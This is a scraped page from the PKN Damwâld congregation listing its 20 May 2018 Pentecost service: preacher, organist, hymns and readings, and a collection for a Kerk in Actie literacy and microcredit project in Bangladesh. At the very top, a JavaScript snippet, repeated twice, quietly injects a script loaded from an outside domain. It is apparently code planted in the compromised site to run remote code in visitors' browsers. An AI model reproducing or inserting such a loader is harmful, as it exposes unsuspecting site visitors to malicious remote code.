;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 mei 2018 9:30 uur - PKN Damwâld
zondag 20 mei 2018
09:30 uur

Kerkdienst zondag 20 mei 2018 9:30 uur

Thema: Eerste Pinksterdag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Foeke Wiegersma
Thema:Eerste Pinksterdag
Liturgie
Lied voor de dienst ELB 147: 1,3 en 6
Kerkenraad komt binnen , daarna zingen we staande :
Aanvangslied : Ps. 62:1 en 5
Stil gebed, Votum en Groet
We zingen: Elb 382
De kinderen verlaten de kerk , kindernevendienst in het Skûlplak
Wet .
We zingen : Ps.139:2 en 3
Gebed
We lezen: Hand.2:1-24 en 32 - 36
We zingen: ELB 148
Preek .
We zingen: Gez.242:2 en 3
Kinderen komen terug in de kerk
Collecte
Gebed
Slotlied : Gez.305:1
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Versterk de kleine keren in Bangladesh

In het islamitische Bangladesh behoren de Christenen tot de armste bevolkingsgroepen. Veel Christenen in Bangladesh kunnen nauwelijks lezen of schrijven en ook hun voorgangers hebben weinig onderwijs gehad. De kerk in het district Mymensingh (MCCP), partner van Kerk in Actie, biedt hulp in allerlei vormen. Op de zondagsschool krijgen kinderen elke week bijbelonderwijs en leren tegelijkertijd lezen en schrijven. Door de week is er huiswerkbegeleiding voor schoolgaande kinderen. Veel ouders kunnen niet lezen en schrijven, dus iedere hulp is welkom! De volwassenen kunnen ook bijbelonderwijs en alfabetiseringscursussen volgen. Daarnaast biedt de kerk vrouwen bijvoorbeeld naailessen aan, zodat ze vanuit hun eigen huis extra geld kunnen verdienen om hun gezin te onderhouden. Vrouwen die de training met goed resultaat afronden, krijgen een klein microkrediet om een eigen naaimachine te kopen. Ook worden er microkredieten verstrekt aan gemeenteleden om een training te volgen. Ze leren bijvoorbeeld groenten te verbouwen of een koe te verzorgen om zo hun inkomen te vergroten. Op die manier kunnen ze een leven leiden boven de armoedegrens. Vandaag, met Pinksteren, is de collecte bestemd voor het zendingswerk van Kerk in Actie, zoals het werk van MCCP in Bangladesh.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds